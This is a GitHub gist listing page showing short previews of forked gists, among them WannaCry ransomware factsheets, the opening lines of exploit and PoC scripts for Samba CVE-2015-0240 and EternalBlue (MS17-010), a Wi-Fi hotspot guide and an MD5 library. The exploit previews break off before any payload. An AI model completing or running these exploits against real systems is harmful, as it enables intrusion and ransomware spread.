Skip to content

Instantly share code, notes, and snippets.

View page2me's full-sized avatar

page2me kitarotao page2me

View GitHub Profile
@page2me
page2me / wcry.md
Created May 20, 2017 08:34 — forked from anonymous/wcry.md
wcry.md

Ransomware attack hits UK NHS, Spain Telefonica and many other countries

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: Windows 7 is vulnerable. It uses EternalBlue MS17-010 to propagate.

Malware samples

@page2me
page2me / Wannacrypt0r-FACTSHEET.md
Created May 20, 2017 08:34 — forked from Epivalent/Wannacrypt0r-FACTSHEET.md

WannaCry|WannaDecrypt0r NSA-Cybereweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Malware samples

@page2me
page2me / Wannacrypt0r-FACTSHEET.md
Created May 20, 2017 08:34 — forked from rain-1/Wannacrypt0r-FACTSHEET.md

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@page2me
page2me / create-hotspot.md
Created May 19, 2017 03:08 — forked from narate/create-hotspot.md
Create Wi-Fi Hotspot on Linux using nmcli

Create a Wi-Fi hotspot on Linux using nmcli

Original post : https://unix.stackexchange.com/a/310699

nmcli con add type wifi ifname wlan0 con-name Hostspot autoconnect yes ssid Hostspot
nmcli con modify Hostspot 802-11-wireless.mode ap 802-11-wireless.band bg ipv4.method shared
nmcli con modify Hostspot wifi-sec.key-mgmt wpa-psk
nmcli con modify Hostspot wifi-sec.psk "veryveryhardpassword1234"
@page2me
page2me / cve-2015-0240_samba_exploit.py
Created May 15, 2017 05:06 — forked from worawit/cve-2015-0240_samba_exploit.py
Exploit for Samba vulnerabilty (CVE-2015-0240)
#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
@page2me
page2me / cve-2015-0240_samba_poc
Created May 15, 2017 05:06 — forked from worawit/cve-2015-0240_samba_poc
PoC for Samba vulnerabilty (CVE-2015-0240)
#!/usr/bin/python
"""
PoC for Samba vulnerabilty (CVE-2015-0240) by sleepya
This PoC does only triggering the bug
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
#################
Exploitability against CentOS/Ubuntu binaries
@page2me
page2me / ms17-010-bsod.py
Created May 15, 2017 05:04
eternalblue poc
from impacket import smb
from struct import pack
import sys
'''
PoC for trigger EternalBlue bug (BSOD)
Reference:
- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/
'''
@page2me
page2me / eternalblue_exploit.py
Created May 15, 2017 05:03 — forked from worawit/eternalblue7_exploit.py
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@page2me
page2me / api.py.patch
Created April 26, 2017 18:48 — forked from windows98SE/api.py.patch
[fix] LINE API function login ( api.py ) / new examples
@@ -55,7 +55,21 @@
After login, make `client` and `client_in` instance
to communicate with LINE server
"""
- raise Exception("Code is removed because of the request of LINE corporation")
+
+ self.transport = THttpClient.THttpClient(self.LINE_HTTP_URL)
+ self.transport_in = THttpClient.THttpClient(self.LINE_HTTP_IN_URL)
+
+ self.transport.setCustomHeaders(self._headers)
@page2me
page2me / md5.js
Created April 26, 2017 18:48 — forked from windows98SE/md5.js
JavaScript implementation of the RSA Data Security
/*
* A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
* Digest Algorithm, as defined in RFC 1321.
* Version 1.1 Copyright (C) Paul Johnston 1999 - 2002.
* Code also contributed by Greg Holt
* See http://pajhome.org.uk/site/legal.html for details.
*/
/*
* Add integers, wrapping at 2^32. This uses 16-bit operations internally